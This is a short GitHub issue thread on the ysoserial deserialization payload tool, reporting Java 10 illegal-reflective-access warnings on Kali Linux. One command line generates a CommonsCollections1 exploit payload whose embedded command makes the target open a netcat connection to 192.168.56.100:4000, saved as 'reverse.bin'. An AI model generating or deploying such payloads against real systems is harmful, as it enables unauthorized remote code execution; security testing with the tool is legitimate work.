### ISSUE TITLE
java 10 warnings

### ISSUE THREAD

**Issue by jeremychoi** [frohoff/ysoserial#95]
With Java 10 (installed by default in Kali 2018.03), warnings like below occur.

root@kali:~/Downloads# java --version
openjdk 10.0.2 2018-07-17
OpenJDK Runtime Environment (build 10.0.2+13-Debian-1)
OpenJDK 64-Bit Server VM (build 10.0.2+13-Debian-1, mixed mode)

root@kali:~/Downloads# java -jar ysoserial-master-v0.0.5-g16fc48b-20.jar CommonsCollections1 "nc 192.168.56.100 4000" > reverse.bin
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by ysoserial.payloads.util.Reflections (file:/root/Downloads/ysoserial-master-v0.0.5-g16fc48b-20.jar) to constructor sun.reflect.annotation.AnnotationInvocationHandler(java.lang.Class,java.util.Map)
WARNING: Please consider reporting this to the maintainers of ysoserial.payloads.util.Reflections
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release

**Comment by ScienceBreathingDragon** [comment]
I'm getting the same error with java 10 installed, even when explicitly pointing to the jdk 7 java.exe?
